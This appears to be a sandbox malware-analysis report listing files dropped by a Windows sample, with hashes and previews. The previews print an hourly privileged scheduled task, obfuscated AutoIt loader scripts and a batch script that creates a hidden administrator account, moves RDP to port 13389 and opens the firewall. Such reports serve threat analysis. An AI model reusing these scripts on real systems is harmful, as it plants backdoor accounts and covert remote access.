Size (bytes):	835
Entropy (8bit):	5.181438124222707
Encrypted:	false
SSDEEP:	12:TMHdGa4+DWCOvCONsbOn0EpdDOfqZvljYCO0xMGTeSyL6ls1whowh/LO7sgYrHwz:2dH4+S3vdjpdYd0xT1yL6Vh7hT4WWpn
MD5:	F6BCEC1FBFAA6DD76D1B40439FA57068
SHA1:	62531D18080DD8B116D41458DAC4ABE5F352B135
SHA-256:	994D5558269ACD84E36C5D0B42A017BB79D91B042B87671CA6E4F83930606225
SHA-512:	9D0D776FA8A9CFC7521677EFE8EDF56965DDD9A1B0EA959F6D14BA6AF422DA5A547D634C8CB0DE709BE383C0352510920B42E53FBB857A4C530EB83861864EDE
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <TimeTrigger>.. <Repetition>.. <Interval>PT1H</Interval>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2019-10-30T05:02:00</StartBoundary>.. <Enabled>true</Enabled>.. </TimeTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <AllowHardTerminate>true</AllowHardTerminate>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Priority>7</Priority>.. </Settings>.. <Actions Context="Author">.. <Exec>.. <Command>C:\Users\user\AppData\Roaming\UeNuQ\939.vbs</Command>.. </Exec>.. </Actions>..</Task>

C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	5.156023391995164
Encrypted:	false
SSDEEP:	24:2CYg1Yvc9Kl7cc8Jy27evtTykSvUvjrjaxV2MZKh+uTDsd5aTEubQubQaLUauEWZ:jd1SKJ1Jy3pyWHyp0sQUaw/iLHri
MD5:	6D19B2702B77A20B89818484CBC83506
SHA1:	F42DBD3AB3C60EA9952E2A0F66826E153F89D943
SHA-256:	042EF6E3349EDEF436E425A5EC5D7C23F49A93F2866AE31C10ADA08E9E012D5F
SHA-512:	184E47C8AAA2E8A391E08BA2C5932C6A16B620303C4C985DF9E149770A866E8E3948A027150070044CDB56ADFB11AD8B8CBD5979E78A0FBF444868CAB9B4A285
Malicious:	true
Preview:	@ echo off..setlocal..set admins_sid="S-1-5-32-544"..set remote_users_sid="S-1-5-32-555"..set rdp_port=13389....rem admins group..set "wmic=wmic group where sid=%admins_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>nul set "%%i"..set admins_group_name=%name%....rem remote users..set "wmic=wmic group where sid=%remote_users_sid% get name /value"..for /f "delims=" %%i in (' "%wmic%" ') do 1>nul set "%%i"..set remote_users_group_name=%name%....set login=%1..set pass=%2....net user %login% %pass% /add..net localgroup %admins_group_name% %login% /add..net localgroup "%remote_users_group_name%" %login% /add..net accounts /maxpwage:unlimited..reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %login% /t REG_DWORD /d "00000000" /f......reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d %rdp_port% /f..netsh advfirewall firewall add rule name="RDP Port %rdp_port%"

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Adunazione.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152253
Entropy (8bit):	5.776859111219554
Encrypted:	false
SSDEEP:	3072:IaM5g03DpPy1ILn3V4GKQZuriTtrxIjq9lwAbV0fzISnr+7/C3T/C4N2P/CpKYN:IaM+KPbdHxujMuAb2Lni7/CD/C4oP/CL
MD5:	26D71780D392B15532AED9E37216F162
SHA1:	4EBE507D17371EBA5C6885BFCDAD1EE3358747E3
SHA-256:	A6CC34F6068C12B795875FC277023D533E35E4C9A6E042B37C1B9DEDB84829CC
SHA-512:	83C433DDAD2B24FFBD1EBE8056D0742F5CE4D9998E6F6A1F50621AB37B0E4378373F692F134EDC65719F9FFB2EC820153C5FA38CFB1BDF92AA38A41AA728EBC2
Malicious:	false
Preview:	ExEmeFEONYoqEvSCinzANgVzIiPAfHtQSpbNuSBezDsOUqaPzkyIamydmlRVPrmuUaixZycgXsup=imIOZutBvbatihVwFjfrkUCSXQgPQKqaWzsLoiQXcEbUPdRRmjatQyKjWPQpSgLMbqiNWlTbvaIHbIrGYbfDaVCQJtOzdGyiSKvOorVfzUInbrPhMplcZizBnstRcmiPhBOMkgbUBqpnhraFfBGuvKiLsVdRZrTTMTkWgrwnLfTZYVhxZnCUTqaDzrcdXGV..ifLxScskmocuRoNcHWRABYqMAHDkILAyxxRIlTBDidcKFjMldZIqOxWofYTlSyD=HfMvdtkOcgzlCfigVaUIrAdZnJzkZdLwNIefmfTkOUFAwLFZRFfmkUJiZMXHLZOtCsbUhSOFnJUpUPYMrxxzwjQSYVfNajAOyBYKgKLYRJqBqAhpOkEsFxefAEWaCwhjoytzRhnaIcCajgSnHuYuIopKnIlJOzvQcNzUcUsAMk..pSKrkLnKceuEZWzUprOEgZMWnVYeNObxvmqSOEYXfJqNgpzYeZobYGxpyNFfNvWGEMiAVA=FtQgEZZIgCZZNGqcQtQNwYJpTMzoCeTeBTCaiaPlutsNOvpZEssctNtGcGcSFQujJWnTrHgbfGGWHVcvDzEkKnYNPWXAW..FdYttRYfVXeTuniiZmkYfkjVBlYKtiJNBsqdXCREnhbHoRamGHWbfYIztrDTSgkOhgaObRlvHGAwNE=KSmtvlknCJGjTZYLpeJzTnDwPbmPIbHGmdTqzlODwQPyQFdbJVdYtkTkgbgYKcQyeqMCyXaZhyarJnllieuNuICgbHMVVPSFZKrPSNsMCsKYSQBQjtRIfrYznnynlbtbhNrYcxsxKzlPXDcHyVIQYlfWMJszHTBthhLyMDcSM..YWSovUrnafPhmebujLrYMQRuCKSdUCAQrBjatDhvdpBjfZNIHGdJOOKiyMGLeMD=OZpYQyeJnHHCfE

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Amo.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	data
Category:	dropped
Size (bytes):	361472
Entropy (8bit):	7.999478480947453
Encrypted:	true
SSDEEP:	6144:vb1JGfcuWETWuf9gWugBxGOK3BzK8hb49UodCPkxFALtWpTTkhZq63:vhq7VyWlxtiNK8hk5EWKtWpTTkR
MD5:	19C1BAC572EDF51745B04E858508C2A8
SHA1:	5629A972D32CC955F6C22AEFB4832CC30CC24B8A
SHA-256:	F9D52F9539BC9007576369869760D889BC4EA31C641EA051CF6BC496CE58497B
SHA-512:	7384CF38339A58BC9C077DE3394F34C6A286B47D9A59B48BD1171B2964835281AECECDF0AC10193415D0D963BAF46C1064ED47312CE658B6F0B22D94E6FD1FC4
Malicious:	false
Preview:	.(.._QCF.k............A....:!8.'.......rj.#OQ7n.o#.'...^...f..$.R.....E0.Y5.c..!. K.....=.....B....x3..h..u,...0...W....... .uS8...n.,....s`...\|.M.`RX~....4....MZg9...K...I.]...%L.j.R.Ax"..........{p.....DQ..G9...1.2pw.. .Y![.?u.O]..).... ...po.a..SD...X.rP....p;..+.."`z....,[.?y....bFYN+.a.......E..>.'s....S.9..P........,....l..z5W.f.I..es&+....A`.....J.3........lq8ae.c.d.Y,.}<.QEgu=..c...c..6.Ho.....P..f.Cu....%V....ik.I...". 9...fo.g.v...}./h.."...O.o........tF:..`..K...C....C..,.eb..b.P4..!..,..&...p..........l.Q..3._..D.......le>.L!.[k..\..8.3.:.1./.Z......N...0...Jw............ ntu....!...~=..O..).$>3k...g.GI\|MT.`n<..>..)d....4.sbD[.u9.c...y..H..G.lt\|-..v.\|...U......iH.n.WM3.....'..f.R...=Qx.A./...3...>.$4..rh..b..'\|(....&.....$...F.... i...~:..K..8D.qj<Bx.X..T.)...gK.k.;i..sh.....\|h-+,.{..0-....?..ic.K.R....>....V.0...K....w.V@..F..d?.$Z.,..*.T..{`....)X.)O.i....^..g.....m....L.+....=.V......"...h...Q.J...F1..3..]..aD..1.

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Bel.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	7.997878624577866
Encrypted:	true
SSDEEP:	1536:LjvQnuo3ODQPp4myNoEsIgrpOp5eA5zLVYfrwBNA+1DyevWxx93clTaREbis4AJJ:v4uoFR4myNoJIII5eMzLK7UDdOt3clmM
MD5:	E4F38ADA217F47C7ACF0B1A0C7D86C59
SHA1:	C8BC4DB75803E0464DE7ABF074AF05B7538957CA
SHA-256:	EE6A09A3252B0B091B9974BF2809AC6150799A62F3656482B324348A9EB0CB05
SHA-512:	0CC645F178528121F8F05BCDDEDFEF9AB3B23F018F100DE1096DCC63816C2684F70DE24D0B1A60AF4D944CC4B39402A3532815D99760776F9FFA5C71A84A5430
Malicious:	false
Preview:	.L:...qG....6[W.....Sr..0.[W..j....;.zVx?...-.....upj1.^.X.5.%...w..Z.r.V..g...i.B.l.I..$.....]..c...9;....L...!s..V.XKk.1.lo.R=..,......$............5;..K.C.t.x.u...jg....F...7..)..D.p...\=.2...+d..s.$.....v.O...7^we..1....CE.5.U5.!._,E...7...'\|].t.39../q.Zgl.h.{..... .\.l.'......=...\.kt.s(c.,E..4...j.".m..a.....-.r.T..F.x.`-.j...[M........ty......x.....o...,..(sR...jMm." .J7..:.....x..+.u.A.-oJFbx._.N.....v.t...A...e.UQu...K...`..{..%z..0u.l..k..>\|.K..2....i.....w......Q!..".-J+.:..Y...X...9...\|...E.........N.H........5...#.D$r.}...}o=.+..q.D\|%....b$.h.B..A..%..,n@....A1...n..oQ.y..m..l.[.ag..'.c0...Ex....1k..`...F.v..&..) ..+<?..........4...HU....RWM@R.Lt.\|.......m.e..E3....@] O.n..2.e^..E.C5.........w.l)G./=ZL...EZ...X..Y.Y...R.K..px.%...0..L..tK).....F..&..X.t..9Il.p>w.<....G..g...%..\..W..9I......;.=.PS....q.-.o..."B..O......U.. ...d....?...q2S.p...e`,..s.k..jH`i p..pe.p...]H.Z.....Q.G..F.k.8.......$.r......*"4x........\.

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Cio.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	ASCII text, with very long lines (353), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	1028386
Entropy (8bit):	5.83926377750451
Encrypted:	false
SSDEEP:	24576:Dltd7G6p3tziDzIysocUbYdMigj9Hv92c:JfT9zinIwbkc
MD5:	D353F3670FCC64603B64C0A6CCA90928
SHA1:	1D354A3469A77AA085EB2A71463F86A5E3A28AB6
SHA-256:	017BF1D9BA8D0D162BC99FD78D5C8A84DA0221B1A4864F177CCA26AEF3AB3C42
SHA-512:	25CB7776906BF4B885CE5FB794397367AC23157DB460B3747F320C3AF7D6C9DCA3C1814B5D7B3C863726867A748D01ECCCD0CD64C2FEC0BB1B81886D0078C087
Malicious:	false
Preview:	$xZikekkLZ = OOAetW("90@89@79@82@116@75@126@84@120@77@123@123@84@86@114@85@96@131@123@120@80@83@127@117@106@119",9)..#NoTrayIcon....Func dOhOLGl($pbUyU,$DPiEvjjJc,$iIqeZxCq,$HAkvHtGEr)..Local $oNThbFvJOtySrDYlNlesywEzazmmQHoeoNZVuPCOudyDczztuvRSDURuo = 'UruWTiVeJfDrrXIgkOWqYZqczzPdmhVTMHVnIpbXIaJrAeaUlfJrloAVrKCmsECvzKdvepFwsYaGfWUdwUylESIDiZxYHXGrPhKQLWSqJIMjQTFiPknbnaRBwNgePHxzagQejrFyeyAWuvNhxhocmoEvcoPYHPkwhaTBrDULGzxzRVxEZwIBmZTpJzGrgGbhUmIND'..Local $lRavOuOkFmOlZGiJ = OOAetW("83@113@115@109@79@121@111@80@106@103@115@72@82@122@108@89@123@103@84@123@67@86@67@90@79",1)..Local $HMjjipjPfAnrLfx = 'OBzztwgcTsoxfWHtvDNMBViUxwQLnfEDYGuZFxyGbRaPqRmzSxHoCIaTxmZrkCWDNFcIQHmebigKCsUCBvStIvwdgjFuxecUUOexvQClUEKxxIseEvBOKSVsEyxEezHxMzPNfmuLUHptLGVGUCBYBHleTKQdvYoBWfIwSDMyfQTeJQGXpNJmSJTyoNUEIQgVmHicYUNsPcJKNoaetSiIfIJhcCStJovmBYCwIlZgZaJvZpaqxRAQJFFQYUZceJHHYloOFszUTSIXZhhjlSKSIG'...$mBgpYYvkhGHs = 100..$FcxcjXWIt = 51..While ((6195-6194)*5738)..Switch $mBgpYYvkhGHs..Case 92....$TLgjEJAYPGkDC

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\D

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (353), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	1028386
Entropy (8bit):	5.83926377750451
Encrypted:	false
SSDEEP:	24576:Dltd7G6p3tziDzIysocUbYdMigj9Hv92c:JfT9zinIwbkc
MD5:	D353F3670FCC64603B64C0A6CCA90928
SHA1:	1D354A3469A77AA085EB2A71463F86A5E3A28AB6
SHA-256:	017BF1D9BA8D0D162BC99FD78D5C8A84DA0221B1A4864F177CCA26AEF3AB3C42
SHA-512:	25CB7776906BF4B885CE5FB794397367AC23157DB460B3747F320C3AF7D6C9DCA3C1814B5D7B3C863726867A748D01ECCCD0CD64C2FEC0BB1B81886D0078C087
Malicious:	false
Preview:	$xZikekkLZ = OOAetW("90@89@79@82@116@75@126@84@120@77@123@123@84@86@114@85@96@131@123@120@80@83@127@117@106@119",9)..#NoTrayIcon....Func dOhOLGl($pbUyU,$DPiEvjjJc,$iIqeZxCq,$HAkvHtGEr)..Local $oNThbFvJOtySrDYlNlesywEzazmmQHoeoNZVuPCOudyDczztuvRSDURuo = 'UruWTiVeJfDrrXIgkOWqYZqczzPdmhVTMHVnIpbXIaJrAeaUlfJrloAVrKCmsECvzKdvepFwsYaGfWUdwUylESIDiZxYHXGrPhKQLWSqJIMjQTFiPknbnaRBwNgePHxzagQejrFyeyAWuvNhxhocmoEvcoPYHPkwhaTBrDULGzxzRVxEZwIBmZTpJzGrgGbhUmIND'..Local $lRavOuOkFmOlZGiJ = OOAetW("83@113@115@109@79@121@111@80@106@103@115@72@82@122@108@89@123@103@84@123@67@86@67@90@79",1)..Local $HMjjipjPfAnrLfx = 'OBzztwgcTsoxfWHtvDNMBViUxwQLnfEDYGuZFxyGbRaPqRmzSxHoCIaTxmZrkCWDNFcIQHmebigKCsUCBvStIvwdgjFuxecUUOexvQClUEKxxIseEvBOKSVsEyxEezHxMzPNfmuLUHptLGVGUCBYBHleTKQdvYoBWfIwSDMyfQTeJQGXpNJmSJTyoNUEIQgVmHicYUNsPcJKNoaetSiIfIJhcCStJovmBYCwIlZgZaJvZpaqxRAQJFFQYUZceJHHYloOFszUTSIXZhhjlSKSIG'...$mBgpYYvkhGHs = 100..$FcxcjXWIt = 51..While ((6195-6194)*5738)..Switch $mBgpYYvkhGHs..Case 92....$TLgjEJAYPGkDC

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 99awhy8l.exe, Detection: malicious, Browse Filename: eRApzqPkL1.exe, Detection: malicious, Browse Filename: eRApzqPkL1.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: pennicle.txt.ps1, Detection: malicious, Browse Filename: SolPen.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Mantenere.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	data
Category:	dropped
Size (bytes):	1938944
Entropy (8bit):	7.999907237328059
Encrypted:	true
SSDEEP:	49152:/D1DYPeFt33s7BJjz1CutDFF8Jv6o35bzPkTGD:LieFZ3aBGu9FC8o3Bd
MD5:	320E70E313B3D2E1FBCCB281EE8B30BC
SHA1:	FAB977083428CF69106EAE435D08BCFB35899DA1
SHA-256:	37D7BEB2569830B9E05F0A7DAC9B575D458AFAA726DED46F48D238CEFAE444B2
SHA-512:	CB736A790FCB7AE09A43F8A33E316FDC96CA1F8B0A508D8E2F4CEEB72429961E13FDC155D8900714EFBD5995E43A0887AC873DA0F84D03CBB128311750E550DA
Malicious:	false
Preview:	.l.][...pR...1u.rQK.z.g..A...zlC}.q.9......?&..r..g.6.xn.v.Kb...eT1....."...q....t.J.KNE\......jcY.~...S.M$.7.x..k.7..J....W...K&......G.Y..n.bp..x$.6..@QL..h..v}?...@.d}.>U.#^..$.a..R..'...p0.-...!O.A.6...&...6v%B....#.....?..,Zdv$66O5....H...........~t.....uB..T..V).n~.....(.zc,V.;}s.......WU.^.,+......@F...._[..\|.......{.U..kv...//.)e..d.d'...@.5<8.Fr...eo...)......l..v.j<.XZ;(.<......~.f...&U...\|....Q.....6]...$..o.Hl.ab....F. j.P..a.Y....]6.....,E....T....B.f..{o.....`Om.~.T...V....;.6...hE)...tN..%.h..de]......_...#...C7sz.5.g....b&..Y.S.Y[..c....gV....~.v M..i.?X.U[q.{.c.$..R7& V.e..........I4.M\|.]..\..@.x.....ze...L..o..2..EN.G.4p.Z......c.9.,P.=.O[Z.Z>Wx......:?../u..Fm..U...M...yp\|El+n.Z;r.Y...kh.2v...i.....g..zj....5....%.~............G&.d.v.`j.....i..7....E......z..C.........]..z..I.tE.M,.s../..l..h...'..kb..........mIs[..v1v...#W....Ad....J*.R&.=..bt...^.ni.'9^.....m....<}..._..D...?....=......1

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\R

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (352), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	1043006
Entropy (8bit):	5.855292086933286
Encrypted:	false
SSDEEP:	6144:lsumrpbef89hPHsjG+XGma+yiEn5sgz7GP/PDkLyHiB+0RhqTGlTJIWIjly2brL4:3z0bPHHFmabiEn58P6yCBlelyaC0W7
MD5:	EBA2DA2CCB2A92B10E917608F89F8758
SHA1:	232C57CD8BAA2A2017C87274460F3A0B94E1EA33
SHA-256:	D70EFDCFF9ECE6DBA302999CF7121CEBB2625A0A8630977ADFFA0AFDB5AF589F
SHA-512:	AEDEA7FA624A3E05C554EA41C70D7374E8DF0532293768101E9B3FF23AA17F0D386246A90F0063222D225A00B2DF74A312C97CDC5DF3B19912AA07042F515AE7
Malicious:	true
Preview:	$cXEBDC = OPtVKuztlSKJN("98#68#98#70#108#119#70#75#116#97#74#122#73#73#107#66#105#106#84#118",0)..#NoTrayIcon....Func rsxEGWkKMOncmt($XPKf,$MjonO,$KnUcQrN,$KdjRhhrO,$wYQp,$MeGga,$dyjyR,$AkSzH)..Local $QGDSenpYiiAYvbMROCLnb = 'tuZWNRVLzGtTbymOjTysXtFTTrmqEyGhSkCbTyLarvOTTCZHsqdRayGZAyrJaUihqRqkDeUuiNgBdMqdrSJDPOUMECWNewZofBTwBOrfupJFRyJNtMGmkDbkXgGqyutuNujPTZPfOxbGyfVmToIdcmWLrIrhiepZtDRKSUUyWsLRyRuHaiiXbOKgpBLlVBoLlnCBnlHYgDztOyFjCvUZVjBfSD'..Local $soKlcoZGHfEpomoJUcGmtVmImGoQYWjIV = OPtVKuztlSKJN("117#121#102#76#122#78#82#116#115#75#78",3)..Local $WgmpayB = 'LLGXCKhUItcdscRjUiCIoUFQjUwXhfzbtvBaQnusbUatjxLAvjflDTgQyPKHIfHaKXkUUmvvwllgCAESoBAwqoUkoLjqNnIihZzgpQFXPTpaIqhFkSniOGaCeZMphvICCeqDufIaVDkuZCCinHPVZAzHHRkptvKzkGPGZKnVpukkxkCAbEKFGNCwJzVgtmh'...$XiwMJ = 148..$vqYJDYaIQRePb = 74..While ((5800-5799)*5351)..Switch $XiwMJ..Case 143....$biOwerEHqrHZO = Execute(OPtVKuztlSKJN("79#94#117#107#47#127#126#81#120#120#112#124#127#96#123#97#87#115#48",7))..$142 = 113..For $XjXOGOJMMZjeGbgXwXv

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Raccontero.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	data
Category:	dropped
Size (bytes):	943924
Entropy (8bit):	6.625735643545649
Encrypted:	false
SSDEEP:	24576:ZJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:ZC7hGOSPT/PxebaiO
MD5:	58B5BF5A115DE982ECF7842C982D6DBD
SHA1:	C85D93BAC730B5E3B4B521CE49F79737890AB878
SHA-256:	2DD1BDEA2C23FEC46072A83756FFB2930319B9127536D3177B01444936383992
SHA-512:	18927F97537A1B33CA0E2D1C6C4F70A38D5E14FFF4E193F66B3B81A2BF9E5163370695762E11653B2765ACDC70D80CCA582D985114EF6E5657D199311CBDD757
Malicious:	false
Preview:	PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B....................................................................................................................................

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: OR8Ti8rf8h.exe, Detection: malicious, Browse Filename: RFQ-004282A.Teknolojileri A.S.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: PQwHxAiBGt.exe, Detection: malicious, Browse Filename: P0J8k3LhVV.exe, Detection: malicious, Browse Filename: NIENrB5r6b.exe, Detection: malicious, Browse Filename: DM6vAAgoCw.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Sparvieri.aiff

Download File

Process:	C:\Users\user\Desktop\8lOT1rXZp5.exe
File Type:	ASCII text, with very long lines (352), with CRLF, CR, LF line terminators
Category:	dropped
